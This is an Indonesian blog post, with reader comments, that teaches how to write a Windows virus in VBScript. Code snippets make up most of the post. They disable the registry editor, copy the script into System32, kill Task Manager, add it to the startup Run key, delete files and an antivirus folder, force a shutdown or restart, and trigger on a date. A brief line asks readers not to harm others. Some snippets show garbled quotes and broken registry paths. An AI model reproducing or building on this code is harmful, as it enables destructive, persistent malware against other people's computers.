Cara membuat Virus Langsung dari komputer

Bookmark and Share
Berikut ini akan saya share sedikit ilmu bagaimana caranya membuat Virus secara langsung dari komputer anda, sebelum saya lanjutkan saya menyarankan jangan digunakan ilmu ii untuk merugikan orang lain
pertama, berikut ini hal-hal yang wajib kita siapin sebelum membuat virus.
# seperangkat komputer berikut monitor,cpu,mouse,kibor, dll (wajib)
# kita harus menyiapkan sebuah file yang ber-ekstensi vbs (*.vbs)
# secangkir teh anget.
# akan lebih afdoL kalo ditemenin lagu2nya rhcp (aku ngefans ma rhcp)
Untuk eksekusi pertama, yang dilakukan virus biasanya mengubah registry.
Sebenarnya udah aku bahas di blogku ini. tapi nggak papa aku ulangin aja.
biar keliatan resmi  . misalnya:
1. mendisable regedit. Yang kita tulis:
On Error Resume Next(perintah ini digunakan pada file vb
supaya kalo ada yang salah bisa dilanjutin kode selanjutnya)
CreateObject(”WScript.Shell”).run “cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\policies\system /v
disableregistrytools /t reg_dword /d “”1?” /f”, vbhide
sebenarnya banyak cara untuk mendisable regedit. misalnya kek gini:
CreateObject(”WScript.Shell”).regwriteHKEY_CURRENT_USERsoftware\microsoft\
windows\currentversion\policies\systemdisableregistrytools”, 1, “REG_DWORD”
lalu mengubah registry yang lain. yang nggak aku bahas disini karena
udah pernah aku bahas pada postingan yang lain di blogku ini.
2. mengopikan diri ke direktory lain
CreateObject(”Scripting.FileSystemObject”).
GetFile(WScript.ScriptFullName).Copy “c:\windows\system32\virus.vbs”
Ada juga cara lain dengan kide seperti ini:
On Error Resume Next
createobject(”scripting.filesystemobject”).copyfile wscript.scriptfullname,
createobject(”scripting.filesystemobject”)
.getspecialfolder(1) & “\virus.vbs”
misalnya untuk mengkopikan diri ke direktory C:\WINDOWS\System32
dengan nama virus.vbs
.getspecialfolder(0) digunakan untuk direktory WINDOWS
.getspecialfolder(1) digunakan untuk direktory SYSTEM32 pada windowsXP
.getspecialfolder(2) digunakan untuk direktory Temporary
3.Membunuh proses.
digunakan untuk membunuh proses
(proses adalah program yang sedang berjalan)
misalnya kita akan membunuh proses taskmanager
On Error Resume Next
CreateObject(”WScript.Shell”)
.run “taskkill /f /im taskmgr.exe”, vbhide
4.Menjalankan virus pada saat startup atau saat windows dihidupkan.
menggunakan regedit
On Error Resume Next
CreateObject(”WScript.Shell”).RegWrite “HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\CurrentVersion\Run\virus”
, “c:\windows\system32\virus.vbs”
(menjalankan virus yang berada di direktory c:\windows\system32
dengan nama virus.vbs)
5.Menghapus File / Folder
agar virus yang kita buat tidak banyak menggunakan script bisa di singkat seperti ini:
On Error Resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\xxx.exe” ‘(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder “C:\antivirus” ‘(menghapus folder antivirus di direktory C:\)
6.Merestart Windows
CreateObject(”WScript.Shell”).run “shutdown -r -f -t 60?, vbhide
merestart windows dalam waktu 60 sekon
7.Meng-ShutDown Windows
CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60?, vbhide
mematikan windows dalam waktu 60 sekon  yang beda cuman
“shutdown -s-f -t 60?
S = untuk shutdown dan
R = untuk reboot\restart
8. Mengaktifkan Virus Pada Waktu tertentu
If day(now) = 1 and month(now) = 1 and year(now) = 2007 then
‘(masukkan kode virus disini)
End if
‘misalnya kalo mau mengaktifkan pada tanggal 1, bulan 1
‘dan tahun 2012

Buat nambahin pengetahuan kita. dan semoga bermanfaat

{ 4 komentar... Views All / Send Comment! }

soki fc said...

payah sekali karna penjelasan nya ngak ada

Bocah Edan said...

Logika programingnya gimana gan? Kalo kita tahu logikanya terus fungsi sintaxnya kan lebih enak, bisa ngembangin sendiri betul g gan?

Chris Redfield said...

ane belum ngerti gan caranya?? -_-

Rawat WebGreen said...

permisi ka,saya ijin promo ya,siap tau kita bisa sharing tentang komputer :D makasih
http://www.asianbrilliant.com

kursus komputer via online

grosir kaos polos

Post a Comment